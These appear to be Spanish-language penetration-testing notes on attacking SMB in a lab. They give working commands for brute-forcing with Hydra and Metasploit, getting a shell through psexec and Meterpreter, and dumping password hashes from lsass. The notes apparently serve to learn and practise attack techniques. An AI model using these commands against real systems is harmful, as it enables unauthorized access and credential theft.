Podemos también hacer ataques de fuerza bruta con Hydra al protocolo SMB: hydra -P user.txt -L passwords.txt smb://192.168.0.30 En caso de obtener un error haciendo ataques de fuerza bruta al protocolo smb, podemos usar metasploit: use auxiliary/scanner/smb/smb_login set RHOSTS 192.168.0.30 set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt set VERBOSE false {{pasted_image_20230730145232.png|}} Una vez encontrado el usuario administrador, podemos loguearnos con la herramienta de psexec siempre y cuando algún recurso compartido tenga permisos de escritura: impacket-psexec administrator@192.168.0.20 Si tiene permisos de escritura: {{pasted_image_20230729132935.png|}} Si no tiene permisos de escritura: {{pasted_image_20230730145409.png|}} No obstante, si queremos entrar con metasploit para obtener una sesión de meterpreter, tendríamos que usar el siguiente módulo: use exploit/windows/smb/psexec Y establecemos los parámetros: set RHOST 192.168.0.20 set RPORT 445 set SMBUSER administrator set SMBPASS password1 Y habremos obtenido lo mismo de antes pero con metasploit una sesión de meterpreter: {{pasted_image_20230729133215.png|}} Ahora podremos incluso dumpear los passwords de los usuarios, por lo que tenemos primero que mirar al proceso lsass para hacer esto: pgrep lsass # Proceso para realizar acciones privilegiadas migrate 464 hashdump {{pasted_image_20230729133349.png|}} También podemos conocer los usuarios si entramos con la shell y usamos el comando net users, donde vemos que en este caso hay tres usuarios dentro del SMB: {{pasted_image_20230729133613.png|}}